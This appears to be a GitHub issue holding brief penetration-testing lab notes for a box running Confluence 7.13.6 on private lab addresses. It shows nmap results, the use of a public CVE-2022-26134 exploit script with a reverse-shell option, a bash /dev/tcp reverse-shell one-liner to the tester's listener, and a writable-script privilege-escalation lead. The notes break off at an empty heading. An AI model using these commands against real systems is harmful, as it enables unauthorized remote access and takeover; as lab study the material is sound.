Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
8090/tcp open opsmessaging? syn-ack ttl 61
8091/tcp open jamlink? syn-ack ttl 61
| Server: Aleph/0.4.6
Search exploit info: --> didn't find
8090/tcp --> Powered by Atlassian Confluence 7.13.6 ---> https://github.com/jbaines-r7/through_the_wire (CVE-2022-26134)
Execute
git clone https://github.com/jbaines-r7/through_the_wire.git
python3 through_the_wire.py --rhost 192.168.196.41 --rport 8090 --lhost 192.168.45.205 --protocol http:// --reverse-shell
-->
(and then execute bash -i >& /dev/tcp/192.168.45.205/443 0>&1
--》 we can get a reverse shell on our temininal)
pspy64 ls -al /opt/log-backup.sh --》 we have write permission for this file!
Keypoints: